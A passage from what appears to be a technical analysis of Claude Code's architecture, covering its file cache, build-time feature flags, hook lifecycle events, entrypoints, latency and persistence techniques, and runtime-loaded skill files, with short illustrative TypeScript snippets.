on demand via projectSnippedView; QueryEngine truncates here to bound
memory in long headless sessions (no UI to preserve).

File State Cache

An LRU cache (100 files, 25MB) tracks file contents across turns. This prevents redundant file reads and enables the undo system. Before any edit, a file history snapshot is taken so the user can revert changes.
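
A minimal sketch of such a cache, bounded by both entry count and total size (eviction details simplified; not the actual implementation):

// Illustrative LRU file-state cache with the limits described above.
class FileStateCache {
  private entries = new Map<string, string>()  // Map preserves insertion order
  constructor(private maxFiles = 100, private maxBytes = 25 * 1024 * 1024) {}

  get(path: string): string | undefined {
    const content = this.entries.get(path)
    if (content !== undefined) {
      this.entries.delete(path)       // re-insert to mark as most recently used
      this.entries.set(path, content)
    }
    return content
  }

  set(path: string, content: string): void {
    this.entries.delete(path)
    this.entries.set(path, content)
    this.evict()
  }

  private evict(): void {
    let bytes = [...this.entries.values()].reduce((sum, v) => sum + v.length, 0)
    while (this.entries.size > this.maxFiles || bytes > this.maxBytes) {
      const oldest = this.entries.keys().next().value as string  // least recently used
      bytes -= this.entries.get(oldest)!.length
      this.entries.delete(oldest)
    }
  }
}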


Feature Flags: Build-Time Dead Code Elimination

The codebase uses Bun's bundle-time feature flags extensively:

import { feature } from 'bun:bundle'

if (feature('VOICE_MODE')) {
  // This entire branch is stripped at build time if flag is off
}

The conditional imports are structured to ensure dead code elimination works:

const proactiveModule =
  feature('PROACTIVE') || feature('KAIROS')
    ? require('../proactive/index.js')
    : null

This pattern ensures that feature-gated modules don't even get loaded in builds that don't include them. Notable feature flags:

  • PROACTIVE / KAIROS -- autonomous proactive agent behavior
  • VOICE_MODE -- voice input/output
  • BRIDGE_MODE -- IDE integration
  • COORDINATOR_MODE -- multi-agent coordination
  • HISTORY_SNIP -- conversation snip compaction
  • REACTIVE_COMPACT -- reactive context compaction
  • TOKEN_BUDGET -- "spend 500k tokens" user-directed budget
  • VERIFICATION_AGENT -- adversarial verification sub-agent
  • ABLATION_BASELINE -- A/B testing baseline

Hook System: Lifecycle Events

The hook system defines lifecycle events:

PreToolUse, PostToolUse, SessionStart, SessionEnd,
Stop, SubagentStart, PermissionRequest, FileChanged,
CwdChanged

Users configure shell commands in settings.json that fire at these events. Hook output is treated as user input -- if a hook says "stop", the agent stops. This is how organizations implement custom policies without forking the codebase.
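
A sketch of what firing a PreToolUse hook might look like (the environment variable names and the "stop" convention are assumptions for illustration, not the documented hook protocol):

// Illustrative: run the user's configured hook command for PreToolUse and
// treat its output as user input -- a "stop" response blocks the tool call.
import { execFile } from 'node:child_process'
import { promisify } from 'node:util'

const execFileAsync = promisify(execFile)

async function firePreToolUseHook(
  hookCommand: string,   // from settings.json, e.g. "./hooks/pre-tool-check.sh"
  toolName: string,
  toolInput: unknown,
): Promise<{ allow: boolean; message?: string }> {
  try {
    const { stdout } = await execFileAsync(hookCommand, [], {
      env: {
        ...process.env,
        HOOK_EVENT: 'PreToolUse',          // hypothetical variable names
        HOOK_TOOL_NAME: toolName,
        HOOK_TOOL_INPUT: JSON.stringify(toolInput),
      },
    })
    if (stdout.trim().toLowerCase().startsWith('stop')) {
      return { allow: false, message: stdout.trim() }  // hook vetoed the call
    }
    return { allow: true }
  } catch {
    return { allow: false }  // assumption: a failing hook blocks the tool call
  }
}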


Multiple Entrypoints: One Engine, Many Interfaces

The QueryEngine is used by four different entrypoints:

| Entrypoint | Path | Purpose |
| --- | --- | --- |
| CLI | src/entrypoints/cli.tsx | Terminal REPL (Commander.js + React/Ink) |
| SDK | src/entrypoints/sdk/ | Programmatic API for embedding |
| MCP Server | src/entrypoints/mcp.ts | Exposes Claude Code as an MCP tool server |
| Bridge | src/bridge/ | IDE integration (VS Code, JetBrains) via JWT auth |

The CLI entrypoint is itself a React application rendered with Ink (React for the terminal). The entire terminal UI -- message bubbles, tool call displays, permission prompts, progress indicators -- is a React component tree.


Non-Obvious Engineering Tricks

1. Speculation

There's a speculation system that pre-computes likely next responses while the user is typing. This hides latency for predictable interactions.

2. Parallel Prefetch at Startup

const [skillToolCommands, outputStyleConfig, envInfo] =
  await Promise.all([
    getSkillToolCommands(cwd),
    getOutputStyleConfig(),
    computeSimpleEnvInfo(model),
  ])

Heavy initialization (MCP client connections, keychain access, API pre-connect, skill loading) all fire in parallel at startup.

3. Memory Prefetch During Streaming

While the model is streaming its response, the system prefetches relevant memories:

using pendingMemoryPrefetch = startRelevantMemoryPrefetch(
  state.messages, state.toolUseContext,
)

The using keyword (TC39 explicit resource management) ensures cleanup on all generator exit paths.

4. Transcript Persistence Strategy

Transcript writes are fire-and-forget for assistant messages but awaited for user messages. The comment explains why:

If the process is killed before the API responds, the transcript is
left with only queue-operation entries; getLastSessionLog filters
those out, returns null, and --resume fails with "No conversation
found". Writing now makes the transcript resumable from the point
the user message was accepted.

5. Tool Use Summaries

After tool execution, the system generates summaries of what tools did. These summaries are yielded to the SDK so IDE integrations can show concise representations of long tool outputs.

6. Numeric Length Anchors

The internal prompt includes:

Length limits: keep text between tool calls to <=25 words.
Keep final responses to <=100 words unless the task requires
more detail.

A comment notes: "research shows ~1.2% output token reduction vs qualitative 'be concise'." Specific numbers outperform vague instructions.

7. Lazy Module Loading

Heavy modules are loaded lazily to minimize startup time:

const messageSelector =
  (): typeof import('src/components/MessageSelector.js') =>
    require('src/components/MessageSelector.js')

React/Ink components, OpenTelemetry, gRPC clients -- all deferred until first use.

8. Error Log Watermarking

const errorLogWatermark = getInMemoryErrors().at(-1)

Before entering the query loop, the system snapshots the last error. After the loop, it can report only errors that occurred during this specific turn, even though the error log is a shared ring buffer that shifts entries.

9. Context Collapse

There's a feature-flagged contextCollapse system that can collapse verbose tool results into shorter representations mid-conversation, reducing context usage without full compaction.


The Skill System: Runtime-Loaded Capabilities

Skills are markdown files with frontmatter that get loaded at runtime:

---
name: commit
description: Create a git commit
allowed_tools: [Bash, Read, Glob, Grep]
---

<prompt content for how to commit>

The SkillTool finds and loads these files, injecting their prompt content into the conversation. This is how /commit, /review-pr, and other slash commands work -- they're not hardcoded features, they're loaded prompt templates.

There's even an experimental EXPERIMENTAL_SKILL_SEARCH feature that uses vector search to find relevant skills automatically based on the user's current task.
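
A sketch of loading one of these skill files (a hand-rolled frontmatter parse for illustration; the real loader presumably handles full YAML and more metadata):

// Illustrative skill loader: split the frontmatter from the prompt body.
import { readFile } from 'node:fs/promises'

type Skill = { name: string; description: string; allowedTools: string[]; prompt: string }

async function loadSkill(path: string): Promise<Skill> {
  const raw = await readFile(path, 'utf8')
  const match = raw.match(/^---\n([\s\S]*?)\n---\n([\s\S]*)$/)
  if (!match) throw new Error(`not a skill file: ${path}`)
  const [, frontmatter, prompt] = match

  const field = (key: string) =>
    frontmatter.match(new RegExp(`^${key}:\\s*(.+)$`, 'm'))?.[1]?.trim() ?? ''

  return {
    name: field('name'),
    description: field('description'),
    // "allowed_tools: [Bash, Read, Glob, Grep]" -> ["Bash", "Read", "Glob", "Grep"]
    allowedTools: field('allowed_tools')
      .replace(/[\[\]]/g, '')
      .split(',')
      .map(s => s.trim())
      .filter(Boolean),
    prompt: prompt.trim(),
  }
}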


What Makes This a "Harness"

The word "harness" captures it precisely. Claude Code is not just a chat interface over an API. It's a sophisticated control system that:

  1. Manages the conversation lifecycle -- from prompt assembly through compaction to session persistence
  2. Gates every action through permissions -- with multiple layers of checks before any tool executes
  3. Orchestrates parallel execution -- running read tools concurrently while serializing writes
  4. Controls context growth -- through auto-compaction, snip boundaries, and context collapse
  5. Enables recursive delegation -- through sub-agents with isolated contexts
  6. Provides budget controls -- max turns, max USD spend, token budgets, task budgets
  7. Supports multiple interfaces -- CLI, SDK, MCP server, IDE bridge -- all sharing one engine
  8. Remains extensible -- through hooks, skills, MCP servers, and plugins

The engineering quality is high. Error handling is thoughtful (the transcript persistence strategy alone shows deep production experience). The feature flag system enables rapid experimentation. The prompt engineering is data-driven (numeric length anchors, A/B test markers).

This is what it looks like when a company with significant resources builds an agentic coding tool from scratch and runs it in production at scale.
